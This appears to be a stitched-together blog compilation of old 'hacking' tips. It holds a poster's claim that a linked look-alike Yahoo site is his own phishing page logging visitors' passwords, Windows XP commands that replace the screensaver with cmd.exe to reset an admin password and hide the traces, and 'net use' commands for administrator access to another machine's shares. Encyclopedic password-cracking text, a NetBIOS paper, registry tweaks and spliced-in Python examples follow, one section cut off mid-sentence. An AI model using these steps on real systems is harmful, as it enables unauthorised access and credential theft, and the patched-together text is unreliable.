guys,
Most of us still don't know that passwords are stolen using PHP pages. These are basically called phishing pages.
Now what exactly are these phishing pages?
They are look-alike pages of the site where the victim's account belongs, built to capture the password.
These pages look very similar to the genuine pages but are not, huh!!
Below is a link:
www.yahoobeta.com
If you click on this link and try to log in, you will not be logged in but will be redirected to the original Yahoo page, and your password and email id will be saved in the log file on my account on the server.
So be aware of phishing pages. Some use them for fun while some have cruel intentions, hence never click on any unknown site, whoever may have sent it to you.
Php Hacking
How to Hack a Window XP Admins Password
This is a cool little computer trick for Microsoft Windows that I've picked up in my travels and decided to share with you fine and ethical individuals =). Log in, go to your DOS command prompt and enter these commands exactly:
cd\
cd\windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit
So what you just told Windows to do is back up the command program and the screen saver file. Then you edited the settings so that when Windows loads the screen saver, you get an unprotected DOS prompt without logging in. When this appears, enter the command in parentheses (net user password). So if the admin user name is Doug and you want the password 1234 then you would enter "net user Doug 1234", and now you've changed the admin password to 1234. Log in, do what you want to do, then copy the contents of temphack back into system32 to cover your tracks.
CREATE YOUR OWN LOGON MESSAGE
Create Your Own Logon Message
1. Click Start, click Run, type regedit, then click OK.
2. In the Registry Editor, drill down to the following key:
   HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
3. Right-click LegalNoticeCaption, click Modify, type: THIS IS NEXT TRICK, and then click OK.
4. Right-click LegalNoticeText, click Modify, type your message, and then click OK.
5. Restart your computer.
6. The message will appear every time you log on!
CMD commands for hacking
CMD HACKING COMMANDS
I am sure you guys know all these commands.... I want to help the beginners, so I am posting this....
Useful Things to do on CMD!
First, open your Network Connection, right-click and select Properties. Then select TCP/IP and click Properties again. Now click Advanced and then the WINS tab. Select Default for NetBIOS.
Now back in the main Local Area Connection window, select File and Print Sharing for Microsoft Networks and hit Enter.
This is just to make sure you have NetBIOS enabled. We will have some fun with NetBIOS on CMD.
The first thing you need to know is some very helpful commands to use on CMD (Command Prompt).
In case you don't know how to get CMD open on your box, click on Start, then Run, then type "cmd" (no quotes, of course... you know the drill).
Back to commands:
nslookup
net view
net use
net user
ping
tracert
arp
route
nbtstat
netstat
ipconfig
In case you don't know some of them, just type the command on CMD and hit Enter. A little help text will show up on your screen. Read it and understand what the command does.
Lets start easy...
1) ping : This command will let you know if the host you are pinging is alive, which means it is up at the time of executing the "ping" command.
ping x.x.x.x (x is the IP address)
or
ping www.whatever.com (www.whatever.com is the website you want to ping, but you don't know the IP)
OBS: Keep in mind that if the host you are pinging is blocking ICMP packets, the result will be "host down" even though it is up.
2) nslookup : This command has many functionalities.
One is for resolving DNS into IP.
Let's say you know the website URL but you don't know its IP (and you want to find out).
nslookup www.whatever.com (www.whatever.com is the website whose IP you want to find out)
Now, another really nice function of nslookup is to find out the IP of specific mail servers:
nslookup (enter)
set type=mx (enter)
yahoo.com
This command will give you the mail server IP of yahoo.com. You can use whatever server you want and if it is listed on DNS, then you get the IP. Simple, isn't it?
OK, now why would you want to have an IP of a mail server?
To send spoofed mail to your friends or even for SE.
In case you looking for "How to spoof email", then look for my "How to spoof email tutorial" http://www.infowar.com/forums/showthread.php?s=&threadid=2360
3) tracert : This command will give you the hops that a packet will travel to reach its final destination.
OBS: This command is good to know the route a packet takes before it goes to the target box.
tracert x.x.x.x (x is the IP address)
or
tracert www.whatever.com (www.whatever.com is the website whose IP you don't know)
4) arp : This command will show you the ARP table. This is good to know if someone is doing ARP poisoning on your LAN.
arp -a
5) route : This command will show you the routing table, gateway, interface and metric.
route print
6) ipconfig : This command will show tons of very helpful things:
your IP, gateway and the DNS servers in use.
ipconfig
or
ipconfig /all
This command will give all that info, but for every network adapter you might have.
Also, in case you have a dynamic IP and want to change it, then type...
ipconfig /release (this will release your IP)
ipconfig /renew (this will renew your IP)
OBS: Keep in mind that those commands will change your IP, but the new IP will still be tied to you. So don't do anything stupid.
7) netstat : This command will show you the connections to your box.
netstat
or
netstat -a (this will show you all the listening ports and connection with DNS names)
netstat -n (this will show you all the open connection with IP addresses)
netstat -an (this will combine both of the above)
net view x.x.x.x or computername (will list the available sharing folders on the target box)
Now some hints:
net use \\ipaddress\ipc$ "" /user:administrator
(this command will allow you to connect to the target box as administrator)
Now if you want to connect to the target box and browse the entire C drive, then use this command:
net use K: \\computername\C$
(this will create a virtual drive on your "my computer" folder)
OBS: Keep in mind that this will only work if the target box doesn't have an administrator password set.
And last but not least, the "help" command:
whatevercommand /help
or
whatevercommand /?
This will help you understand what a command does and all the switches available for it.
Very useful if you know the command, but forgot the right switch.
Password Cracking
Even though functions that create hashed passwords may be cryptographically secure, possession of a hashed password provides a quick way to test guesses for the password by applying the function to each guess and comparing the result to the verification data. The most commonly used hash functions can be computed rapidly, and the attacker can test guesses repeatedly with different guesses until one succeeds, meaning the plaintext password has been recovered.
The term password cracking is typically limited to recovery of one or more plaintext passwords from hashed passwords, but there are also many other ways of obtaining passwords illicitly; without the hashed version of a password, the attacker can still attempt access to the computer system in question with guessed passwords. However, well-designed systems limit the number of failed access attempts and can alert administrators to trace the source of the attack if that quota is exceeded. With the hashed password, the attacker can work undetected, and if the attacker has obtained several hashed passwords, the chances of cracking at least one are quite high.
Otherwise it is possible to try to obtain the passwords through other different methods, such as social engineering, wiretapping, keystroke logging, login spoofing, dumpster diving, phishing, shoulder surfing, timing attack, acoustic cryptanalysis, using a Trojan Horse or virus, identity management system attacks (such as abuse of Self-service password reset) and compromising host security (see password for details). However, cracking usually designates a guessing attack.
Cracking may be combined with other techniques. For example, use of a hash-based challenge-response authentication method for password verification may provide a hashed password to an eavesdropper, who can then crack the password. A number of stronger cryptographic protocols exist that do not expose hashed-passwords during verification over a network, either by protecting them in transmission using a high-grade key, or by using a zero-knowledge password proof.
Principal attack methods
Weak encryption
If a system uses a reversible function to obscure stored passwords, exploiting that weakness can recover even 'well-chosen' passwords. One example is the LM hash that Microsoft Windows uses by default to store user passwords that are less than 15 characters in length. LM hash converts the password into all uppercase letters, then breaks the password into two 7-character fields which are hashed separately, allowing each half to be attacked separately. Hash functions like SHA-512, SHA-1, and MD5 are considered impossible to invert when used correctly.
Guessing
See also: Password strength and Password policy
Many passwords can be guessed either by humans or by sophisticated cracking programs armed with dictionaries and the user's personal information.
Not surprisingly, many users choose weak passwords, usually one related to themselves in some way. Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by programs.[1] Examples of insecure choices include:
* blank (none)
* the words "password", "passcode", "admin" and their derivatives
* the user's name or login name
* the name of their significant other or another person
* their birthplace or date of birth, or a friend's, or a relative's
* a pet's name
* a dictionary word in any language
* a name of a celebrity they like
* automobile licence plate number
* a row of letters from a standard keyboard layout (e.g., the qwerty keyboard -- qwerty itself, asdf, or qwertyuiop)
* a simple modification of one of the preceding, such as suffixing a digit or reversing the order of the letters.
and so on.
In one survey of MySpace passwords which had been phished, 3.8 percent of passwords were a single word found in a dictionary, and another 12 percent were a word plus a final digit; two-thirds of the time that digit was 1.[1]
Some users neglect to change the default password that came with their account on the computer system. And some administrators neglect to change default account passwords provided by the operating system vendor or hardware supplier. A famous example is the use of FieldService as a user name with Guest as the password. If not changed at system configuration time, anyone familiar with such systems will have 'cracked' an important password; such service accounts often have higher access privileges than a normal user account. Lists of default passwords are available on the Internet.[2]
Personal data about individuals are now available from various sources, many on-line, and can often be obtained by someone using social engineering techniques, such as posing as an opinion surveyor or a security control checker. Attackers who know the user may have information as well. For example, if a user chooses the password "19YaleLaw78" because he graduated from Yale Law School in 1978, a disgruntled business partner might be able to guess the password.
Cracking programs exist which accept personal information about the user being attacked and generate common variations for passwords suggested by that information.[3][4]
Brute force attack
A last resort is to try every possible password, known as a brute force attack. In theory, a brute force attack will always be successful since the rules for acceptable passwords must be publicly known, but as the length of the password increases, so does the number of possible passwords. This method is unlikely to be practical unless the password is relatively small. But, how small is too small? This depends heavily on whether the prospective attacker has access to the hash of the password, in which case the attack is called an offline attack (it can be done without connection to the protected resource), or not, in which case it is called an online attack. Offline attack is generally a lot easier, because testing a password is reduced to a quickly calculated mathematical computation; i.e., calculating the hash of the password to be tried and comparing it to the hash of the real password. In an online attack the attacker has to actually try to authenticate himself with all the possible passwords, where arbitrary rules and delays can be imposed by the system and the attempts can be logged. A common current length recommendation for cases where the attacker will not have access to the hash is 8 or more randomly chosen characters combining letters, numbers, and special (punctuation, etc) characters. Systems which limit passwords to numeric characters only, or upper case only, or, generally, which exclude possible password character choices make such attacks easier. Using longer passwords in such cases (if possible on a particular system) can compensate for a limited allowable character set. And, of course, even with an adequate range of character choice, users who ignore that range (using only upper case alphabetic characters, or digits alone, for instance) make brute force attacks much easier against those password choices.
Generic brute-force search techniques can be used to speed up the computation. But the real threat may be likely to be from smart brute-force techniques that exploit knowledge about how people tend to choose passwords. NIST SP 800-63 (2) provides further discussion of password quality, and suggests, for example, that an 8 character user-chosen password may provide somewhere between 18 and 30 bits of entropy, depending on how it is chosen. This amount of entropy is far less than what is generally considered safe for an encryption key.
How small is too small for offline attacks thus depends partly on an attacker's ingenuity and resources (e.g., available time, computing power, etc.), the latter of which will increase as computers get faster. Most commonly used hashes can be implemented using specialized hardware, allowing faster attacks. Large numbers of computers can be harnessed in parallel, each trying a separate portion of the search space. Unused overnight and weekend time on office computers can also be used for this purpose.
The distinction between guessing, dictionary and brute force attacks is not strict. They are similar in that an attacker goes through a list of candidate passwords one by one; the list may be explicitly enumerated or implicitly defined, may or may not incorporate knowledge about the victim, and may or may not be linguistically derived. Each of the three approaches, particularly 'dictionary attack', is frequently used as an umbrella term to denote all the three attacks and the spectrum of attacks encompassed by them.
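The search-space arithmetic behind the "Weak encryption" and "Brute force attack" sections above, as an added example (not from the page's source text): it computes how many candidates an offline attacker must hash for a given password policy, expresses that as bits for comparison with the NIST 18-30 bit figure, and shows what LM hash's two independently hashed 7-character halves do to a 14-character password. Character-set sizes are assumed standard ASCII classes and the guess rates are illustrative assumptions, not measurements.

```python
"""Password search-space arithmetic for the guessing / brute-force discussion.

Added example; nothing here hashes or cracks anything, it only counts
candidates so a defender can reason about policies and storage schemes.
"""
import math

# Assumed alphabet sizes for the worked cases (standard ASCII classes).
CHARSETS = {
    "digits": 10,
    "upper": 26,
    "lower+upper+digits": 62,
    "printable ascii": 95,
}
# LM hash uppercases first: 26 letters + 10 digits + 33 printable punctuation.
LM_ALPHABET = 69


def keyspace(charset_size: int, length: int) -> int:
    """Exact-length search space: every string of `length` symbols."""
    return charset_size ** length


def keyspace_up_to(charset_size: int, max_length: int) -> int:
    """Attacker does not know the length: all strings of 1..max_length symbols."""
    return sum(charset_size ** n for n in range(1, max_length + 1))


def bits(candidates: int) -> float:
    """Entropy of a uniformly chosen candidate from a space of `candidates`."""
    return math.log2(candidates)


def lm_hash_effort(max_length: int = 14) -> int:
    """Candidates an attacker must try against an LM hash.

    LM pads the uppercased password to 14 bytes and hashes the two 7-byte
    halves independently, so the attacker exhausts two 7-character spaces
    (each possibly empty, hence the +1) instead of one 14-character space.
    """
    assert max_length <= 14, "LM only stores passwords shorter than 15 chars"
    half = keyspace_up_to(LM_ALPHABET, 7) + 1
    return 2 * half


def expected_seconds(candidates: int, guesses_per_second: float) -> float:
    """On average half the space is searched before the real password is hit."""
    return candidates / 2 / guesses_per_second


def worked_cases() -> dict:
    """The comparisons the text makes, carried through as numbers."""
    eight_full = keyspace(CHARSETS["printable ascii"], 8)
    eight_digits = keyspace(CHARSETS["digits"], 8)
    fourteen_full = keyspace(CHARSETS["printable ascii"], 14)
    return {
        # 8 random printable chars: ~52.6 bits, far above the 18-30 bits NIST
        # estimates for a user-CHOSEN 8-character password.
        "8_random_printable_bits": round(bits(eight_full), 1),
        # Same length restricted to digits only collapses to ~26.6 bits.
        "8_digits_bits": round(bits(eight_digits), 1),
        # Offline: assumed 1e9 hashes/s of a fast unsalted hash -> a fraction of a second.
        "8_digits_offline_seconds": expected_seconds(eight_digits, 1e9),
        # Online: an assumed lockout policy of 5 guesses/minute makes the same
        # space take ~19 years, which is the whole point of rate limiting.
        "8_digits_online_years": expected_seconds(eight_digits, 5 / 60) / (3600 * 24 * 365),
        # LM hash: 14 chars of printable ASCII is ~92 bits on paper but only
        # ~44 bits once uppercased and split into two 7-character halves.
        "14_char_fullspace_bits": round(bits(fourteen_full), 1),
        "14_char_lm_bits": round(bits(lm_hash_effort()), 1),
    }


if __name__ == "__main__":
    for label, value in worked_cases().items():
        print(f"{label:28s} {value}")
```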
Precomputation
Further information: Rainbow table
In its most basic form, precomputation involves hashing each word in the dictionary (or any search space of candidate passwords) and storing the
NETBIOS
Understanding NetBIOS
By NeonSurge
Released through the rhino9 Team
Preface
Before you begin reading this paper, understand that this paper was written for the novice to the concept of NetBIOS, but - it also contains information the veteran might find educational. I am prefacing this so that I do not get e-mail like "Why did you start your paper off so basic?" - Simple, it's written for people that may be coming from an environment that does not use NetBIOS, so they would need me to start with basics, thanks. -NeonSurge, rhino9 team.
What is NetBIOS?
NetBIOS (Network Basic Input/Output System) was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. Since its creation, NetBIOS has become the basis for many other networking applications. In its strictest sense, NetBIOS is an interface specification for accessing networking services.
NetBIOS, a layer of software developed to link a network operating system with specific hardware, was originally designed as THE network controller for IBM's Network LAN. NetBIOS has now been extended to allow programs written using the NetBIOS interface to operate on the IBM token ring architecture. NetBIOS has since been adopted as an industry standard and now, it is common to refer to NetBIOS-compatible LANs.
It offers network applications a set of "hooks" to carry out inter-application communication and data transfer. In a basic sense, NetBIOS allows applications to talk to the network. Its intention is to isolate application programs from any type of hardware dependencies. It also spares software developers the task of developing network error recovery and low-level message addressing or routing. The NetBIOS interface does a lot of this work for them.
NetBIOS standardizes the interface between applications and a LAN's operating capabilities. With this, it can be specified to which levels of the OSI model the application can write, making the application transportable to other networks. In a NetBIOS LAN environment, computers are known on the system by a name. Each computer on the network has a permanent name that is programmed in various different ways. These names will be discussed in more detail below.
PC's on a NetBIOS LAN communicate either by establishing a session or by using NetBIOS datagram or broadcast methods. Sessions allow for a larger message to be sent and handle error detection and correction. The communication is on a one-to-one basis. Datagram and broadcast methods allow one computer to communicate with several other computers at the same time, but are limited in message size. There is no error detection or correction using these datagram or broadcast methods. However, datagram communication allows for communication without having to establish a session.
All communication in these environments is presented to NetBIOS in a format called Network Control Blocks (NCB). The allocation of these blocks in memory is dependent on the user program. These NCBs are divided into fields, reserved for input and output respectively.
NetBIOS is a very common protocol in today's environments. NetBIOS is supported on Ethernet, Token Ring, and IBM PC Networks. In its original form, it was defined only as an interface between the application and the network adapter. Since then, transport-like functions have been added to NetBIOS, making it more functional over time.
In NetBIOS, connection (TCP) oriented and connectionless (UDP) communication are both supported. It supports both broadcasts and multicasting and supports three distinct services: Naming, Session, and Datagram.
NetBIOS Names
NetBIOS names are used to identify resources on a network. Applications use these names to start and end sessions. You can configure a single machine with multiple applications, each of which has a unique NetBIOS name. Each PC that supports an application also has a NetBIOS station name that is user defined or that NetBIOS derives by internal means.
A NetBIOS name can consist of up to 16 alphanumeric characters. The combination of characters must be unique within the entire source routing network. Before a PC that uses NetBIOS can fully function on a network, that PC must register its NetBIOS name.
When a client becomes active, the client advertises its name. A client is considered to be registered when it can successfully advertise itself without any other client claiming it has the same name. The steps of the registration process are as follows:
1. Upon boot up, the client broadcasts itself and its NetBIOS information anywhere from 6 to 10 times to ensure every other client on the network receives the information.
2. If another client on the network already has the name, that NetBIOS client issues its own broadcast to indicate that the name is in use. The client that is trying to register the already-in-use name stops all attempts to register that name.
3. If no other client on the network objects to the name registration, the client finishes the registration process.
There are two types of names in a NetBIOS environment: Unique and Group. A unique name must be unique across the network. A group name does not have to be unique, and all processes that have a given group name belong to the group. Each NetBIOS node maintains a table of all names currently owned by that node.
The NetBIOS naming convention allows for 16 characters in a NetBIOS name. Microsoft, however, limits these names to 15 characters and uses the 16th character as a NetBIOS suffix. A NetBIOS suffix is used by Microsoft Networking software to identify the functionality installed on the registered device or service.
[QuickNote: SMB and NBT (NetBIOS over TCP/IP) work very closely together and both use ports 137, 138 and 139. Port 137 is NetBIOS name service (UDP). Port 138 is NetBIOS datagram service (UDP). Port 139 is NetBIOS session service (TCP). For further information on NetBIOS, read the paper at the rhino9 website listed above.]
The following is a table of NetBIOS suffixes currently used by Microsoft WindowsNT. These suffixes are displayed in hexadecimal format.
Name             Number  Type  Usage
==========================================================================
<\\_MSBROWSE_>   [01]    G     Master Browser
IRISMULTICAST    [2F]    G     Lotus Notes
IRISNAMESERVER   [33]    G     Lotus Notes
Forte_$ND800ZA   [20]    U     DCA Irmalan Gateway Service
Unique (U): The name may have only one IP address assigned to it. On a network device, multiple occurrences of a single name may appear to be registered, but the suffix will be unique, making the entire name unique.
Group (G): A normal group; the single name may exist with many IP addresses.
Multihomed (M): The name is unique, but due to multiple network interfaces on the same computer, this configuration is necessary to permit the registration. Maximum number of addresses is 25.
Internet Group (I): This is a special configuration of the group name used to manage WinNT domain names.
Domain Name (D): New in NT 4.0
For a quick and dirty look at a server's registered NetBIOS names and services, issue the following NBTSTAT command:
nbtstat -A [ipaddress]
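The 15-character-plus-suffix name layout and the nbtstat listing described above, as an added example that is not part of the rhino9 paper: it builds and parses the 16-byte Microsoft-style name, classifies the suffix using only the rows from the table above, and parses a constructed nbtstat -A listing so a defender can inventory what a host has registered. The "." separator used to carry the scope ID and the sample listing are assumptions for illustration.

```python
"""NetBIOS name helpers for the naming section above (added example).

Microsoft convention: 15 characters of name padded with spaces, 16th byte
is the suffix (service type). Scope ID handling and the sample nbtstat
output below are constructed for illustration.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

NAME_FIELD = 15  # characters of name; byte index 15 is the suffix

# Suffix rows transcribed from the table above; (type, usage). Anything else
# is reported as unknown rather than guessed.
SUFFIX_TABLE = {
    0x01: ("G", "Master Browser"),
    0x2F: ("G", "Lotus Notes"),
    0x33: ("G", "Lotus Notes"),
    0x20: ("U", "DCA Irmalan Gateway Service (row listed for Forte_$ND800ZA)"),
}


@dataclass(frozen=True)
class NetBIOSName:
    name: str           # registered name, padding stripped
    suffix: int         # 16th byte, 0x00..0xFF
    scope_id: str = ""  # NBT scope; two hosts must match to talk at all

    def display(self) -> str:
        """nbtstat-style rendering, e.g. WORKSTATION<20>."""
        return f"{self.name}<{self.suffix:02X}>"

    def same_scope(self, other: NetBIOSName) -> bool:
        return self.scope_id.upper() == other.scope_id.upper()


def encode_name(name: str, suffix: int, scope_id: str = "") -> bytes:
    """16-byte name (space padded, upper-cased) plus an assumed '.SCOPE' tail."""
    if not 0 <= suffix <= 0xFF:
        raise ValueError("suffix must be a single byte")
    if not name or len(name) > NAME_FIELD:
        raise ValueError(f"name must be 1..{NAME_FIELD} characters, got {len(name)}")
    if "\x00" in name:
        raise ValueError("NUL is not allowed in a NetBIOS name")
    raw = name.upper().ljust(NAME_FIELD).encode("ascii") + bytes([suffix])
    if scope_id:
        raw += b"." + scope_id.upper().encode("ascii")
    return raw


def decode_name(raw: bytes) -> NetBIOSName:
    """Inverse of encode_name; tolerates a missing scope tail."""
    if len(raw) < NAME_FIELD + 1:
        raise ValueError("need at least 16 bytes")
    name = raw[:NAME_FIELD].decode("ascii").rstrip(" ")
    scope = raw[NAME_FIELD + 1:].decode("ascii").lstrip(".")
    return NetBIOSName(name, raw[NAME_FIELD], scope)


def classify(n: NetBIOSName) -> tuple[str, str]:
    """(type, usage) from the page's table, or a marker for unknown suffixes."""
    return SUFFIX_TABLE.get(n.suffix, ("?", "suffix not in the table above"))


# One registered-name line of nbtstat -A output: name, <XX>, UNIQUE|GROUP, status.
NBTSTAT_LINE = re.compile(
    r"^\s*(?P<name>\S(?:.*?\S)?)\s*<(?P<sfx>[0-9A-Fa-f]{2})>\s+"
    r"(?P<type>UNIQUE|GROUP)\s+(?P<status>\w+)"
)


def parse_nbtstat(output: str) -> list[NetBIOSName]:
    """Pull every registered name out of an nbtstat -A listing."""
    names = []
    for line in output.splitlines():
        m = NBTSTAT_LINE.match(line)
        if m:
            names.append(NetBIOSName(m["name"], int(m["sfx"], 16)))
    return names


# Constructed sample listing in the layout nbtstat -A prints; not a real host.
SAMPLE_NBTSTAT = """\
           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    WORKSTATION    <00>  UNIQUE      Registered
    WORKSTATION    <20>  UNIQUE      Registered
    WORKGROUP      <00>  GROUP       Registered
    ..__MSBROWSE__.<01>  GROUP       Registered
"""

if __name__ == "__main__":
    for entry in parse_nbtstat(SAMPLE_NBTSTAT):
        kind, usage = classify(entry)
        print(f"{entry.display():22s} {kind}  {usage}")
```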
NetBIOS Sessions
The NetBIOS session service provides a connection-oriented, reliable, full-duplex message service to a user process. NetBIOS requires one process to be the client and the other to be the server. NetBIOS session establishment requires a preordained cooperation between the two stations. One application must have issued a Listen command when another application issues a Call command. The Listen command references a name in its NetBIOS name table (or WINS server), and also the remote name an application must use to qualify as a session partner. If the receiver (listener) is not already listening, the Call will be unsuccessful. If the call is successful, each application receives notification of session establishment with the session-id. The Send and Receive commands then transfer data. At the end of a session, either application can issue a Hang-Up command. There is no real flow control for the session service because it is assumed a LAN is fast enough to carry the required traffic.
NetBIOS Datagrams
Datagrams can be sent to a specific name, sent to all members of a group, or broadcast to the entire LAN. As with other datagram services, the NetBIOS datagrams are connectionless and unreliable. The Send_Datagram command requires the caller to specify the name of the destination. If the destination is a group name, then every member of the group receives the datagram. The caller of the Receive_Datagram command must specify the local name for which it wants to receive datagrams. The Receive_Datagram command also returns the name of the sender, in addition to the actual datagram data. If NetBIOS receives a datagram, but there are no Receive_Datagram commands pending, then the datagram is discarded.
The Send_Broadcast_Datagram command sends the message to every NetBIOS system on the local network. When a broadcast datagram is received by a NetBIOS node, every process that has issued a Receive_Broadcast_Datagram command receives the datagram. If none of these commands are outstanding when the broadcast datagram is received, the datagram is discarded.
NetBIOS enables an application to establish a session with another device and lets the network redirector and transaction protocols pass a request to and from another machine. NetBIOS does not actually manipulate the data. The NetBIOS specification defines an interface to the network protocol used to reach those services, not the protocol itself. Historically, it has been paired with a network protocol called NetBEUI (NetBIOS Extended User Interface). The association of the interface and the protocol has sometimes caused confusion, but the two are different.
Network protocols always provide at least one method for locating and connecting to a particular service on a network. This is usually accomplished by converting a node or service name to a network address (name resolution). NetBIOS service names must be resolved to an IP address before connections can be established with TCP/IP. Most NetBIOS implementations for TCP/IP accomplish name-to-address resolution by using either broadcasts or LMHOSTS files. In a Microsoft environment, you would probably also use a NetBIOS Name Server known as WINS.
NetBEUI Explained
NetBEUI is an enhanced version of the NetBIOS protocol used by network operating systems. It formalizes the transport frame that was never standardized in NetBIOS and adds additional functions. It is the transport-layer driver frequently used by Microsoft's LAN Manager. NetBEUI implements the OSI LLC2 protocol. NetBEUI is the original PC networking protocol and interface designed by IBM for the LAN Manager Server. This protocol was later adopted by Microsoft for their networking products. It specifies the way that higher-level software sends and receives messages over the NetBIOS frame protocol. This protocol runs over the standard 802.2 data-link protocol layer.
NetBIOS Scopes
A NetBIOS Scope ID provides an extended naming service for the NetBIOS over TCP/IP (known as NBT) module. The primary purpose of a NetBIOS scope ID is to isolate NetBIOS traffic on a single network to only those nodes with the same NetBIOS scope ID. The NetBIOS scope ID is a character string that is appended to the NetBIOS name. The NetBIOS scope ID on two hosts must match, or the two hosts will not be able to communicate. The NetBIOS Scope ID also allows computers to use the same computer name as long as they have different scope IDs. The Scope ID becomes a part of the NetBIOS name, making the name unique.
increase the shutdown speed of PC
Increasing XP shutdown speed
Increasing shutdown speed by reducing wait times:
Windows XP stores a couple of values in its registry which are responsible for determining how long to wait before shutting down (killing) open applications and services once the shutdown command has been given.
By editing these two settings and changing them to lower values, you can considerably decrease the amount of time that Windows XP needs to successfully shut itself down. The first part of this tweak deals with setting the amount of time Windows will take to kill open applications on shutdown.
Open REGEDIT and navigate to 'HKEY_CURRENT_USER\Control Panel\Desktop\'
Highlight the 'WaitToKillAppTimeout' value.
Set it to '1000' (the default should be 20000).
Now highlight the 'HungAppTimeout' value
Set it to '1000' also.
------------------------------------------------------------------
FOR ALL USERS
Increasing shutdown speed by reducing wait times :
The second part of this tip changes the same settings, this time for all users on the system.
Open REGEDIT and navigate to 'HKEY_USERS\.DEFAULT\Control Panel\Desktop'
Highlight the 'WaitToKillAppTimeout' value.
Set it to '1000' (the default should be 20000).
Now highlight the 'HungAppTimeout' value.
Set it to '1000' also.
Hiding your IP
You could try reading about wingates, socks and proxies (oh, before I forget, turn off Java, JavaScript, cookies, What's Related, and Smart Update... if you are using IE you're not very smart). Also try installing a firewall, or DHCP, or you can learn from me!
There are situations in which you may want to visit a site without leaving a trace of the visit. For instance you want to check what's going on at your competitor's site. Your visit will generate a record in the log file. Frequent visits will generate many records. Do you want to know what kind of records? see in http://proxies.hotmail.ru/proxyck.htm or http://privacy.net/, http://www.leader.ru/cgi-bin/go?who, http://www.anonymizer.com/3.0/snoop.cgi - will tell you some scary info about what can be told about your computer via the internet.
Note that these tests are not very sophisticated. A dedicated "snooper" can often learn much more. Once I came across a server that tried to connect to my computer's disk while I was browsing... that was an exciting experience. You should also remember about things like cookies (http://www.illuminatus.com/cookie.fcgi), hostile applets and JavaScripts, browser security holes and so on. So why don't we send someone instead of ourselves? Good idea.
Step #1-Determine your IP address:
To determine your IP address, go to http://megawx.aws.com/support/faq/software/ip.asp
Every computer connected to the Internet has a unique identifier called an IP address. On many networks, the IP address of a computer is always the same. On other networks, a random IP address is assigned each time a computer connects to the network. This is what we are referring to when we ask if you have a static or a dynamic IP address. If a system uses dynamic addressing, the IP can change quite often.
Step #2-Get Anonymous:
Method #1: Anonymizer
One can surf anonymously with the help of a nice service called the Anonymizer (http://www.anonymizer.com/3.0/index.shtml). Check their site and just type a URL you want to visit -- the Anonymizer does the job for you, securing you from many potential dangers. When you follow a link on a page viewed via the Anonymizer you get there via the Anonymizer again, so you don't have to type a new URL. You can choose between the pay or free service, but the free service implies certain limitations such as a 30-second delay before pages are loaded, and only HTTP (the pay service allows FTP and HTTPS). There are a few sites that are inaccessible via the Anonymizer, e.g. some of the Web-based free e-mail services.
The Anonymizer has two more nice features. Firstly, there are WWW sites that are inaccessible from one place, but easily accessible from another. Once I was trying to load a page located in Australia for 20 minutes, all in vain. Using the Anonymizer immediately solved the problem. Secondly, there are certain sites that give you information depending on where you are "calling" from. Let's take an example. I was at Encyclopædia Britannica site, trying to check the price for their products. Clicking on Order Information button gave me the list of Britannica's dealers all over the world, no price info. Going to the same place via the Anonymizer led me to a different page, where I found the price list. As it turned out the local dealer's price for Encyclopædia Britannica CD'97 was several times higher than the one at which it's sold in USA. Good savings!
The Anonymizer is probably one of the most popular tools for anonymous surfing, but definitely not the only one. More and more similar services are emerging. A good alternative is JANUS (http://www.rewebber.de/) located in Germany. Janus is free, fast and can also encrypt the URL. Here is a quotation from their FAQ:
JANUS is able to encrypt URLs (uniform resource locator) in a way that these can be used as reference for a server. If a request with an encrypted URL occurs, JANUS is able to decrypt the URL and forward it to the server, without enabling the user to get knowledge about the server address. All references in the servers response are again encrypted before the response is forwarded to the client.
Method #2: Proxy Servers
One can also anonymize one's web surfing by using a proxy server. Proxy servers are similar to the Anonymizer, i.e. web pages are retrieved by the proxy server rather than by the person actually browsing the Web (you). But there are several important distinctions: proxy servers don't help with cookies, hostile applets or code. In most cases they do just one thing: they conceal your real geographic location.
Most proxy servers restrict access based on the IP address from which a user connects to them. In other words, if you have an account with Bluh-Bluh-Com, you can't use La-Di-Da-Net's proxy server; access will be denied. Fortunately you can always find a "kind-hearted" proxy server on the Net whose owners openly state that the service is publicly available, or a proxy server that, for whatever reason, doesn't restrict access, though not everyone knows this.
How do you find a "kind-hearted" proxy server? Good news for lazy people: there are many lists of available proxy servers: http://tools.rosinstrument.com/cgi-bin/dored/cgi-bin/fp.pl/showlog
For those who are not so lazy: find your own proxy server, it's real easy. Go to Altavista (www.altavista.com) and type something like +proxy +server +configuration +port, and you'll get the list of Web pages where ISPs give complete instructions to their users of how they should configure their browsers. Try every proxy address and after 5 or 7 failures you will surely find a proxy server that works for you. So let's say you have found a proxy, e.g.: some.proxy.com, HTTP port 8080. To make your browser use a proxy server fill out the corresponding fields in Manual Proxy Configuration tab (hope you can find it yourself).
In Netscape Communicator do this:
Edit - Preferences - Advanced - Proxies - Manual proxy configuration - View, and for HTTP and FTP type name of your proxy server (example: proxy.siol.net) and port number (example 3128).
In Internet Explorer 4.0 do this:
View - Internet Options - Connection - mark "Access the Internet using a proxy server". At ADDRESS type name of the server (example: proxy.siol.net) and at PORT type port number (example: 3128), click on advanced button and mark "Use the same proxy server for all protocols".
Once you have carried out this simple operation, you can start surfing the Web leaving traces as if you are from Bulgaria, USA, North Korea (that would be fun!) or somewhere else, but ...there is one more very important privacy concern, "Is My Proxy Anonymous?"
Is My Proxy Anonymous?
Not all proxy servers are truly anonymous. Some of them let the system administrator of the site that you visit via a proxy server find out the IP address from which the proxy server is accessed, i.e. your real IP address. You can perform an anonymity check test: http://www.tamos.com/bin/proxy.cgi
If you get the message "Proxy server is detected!" then there is a security hole in your proxy, and information about your real IP address will be listed. If the message is "Proxy server is not detected", everything should be OK. In any case, carefully study the list of IP addresses that is returned by this online tool. None of them should belong to you. You can also use alternative tests to check if your browser is anonymous. Such tests can give a complete list of the parameters your browser passes to a remote server (these are called Environmental Variables). Proxys-4-All (http://proxys4all.cgi.net/tools.html) maintains a long list of environmental checkers.
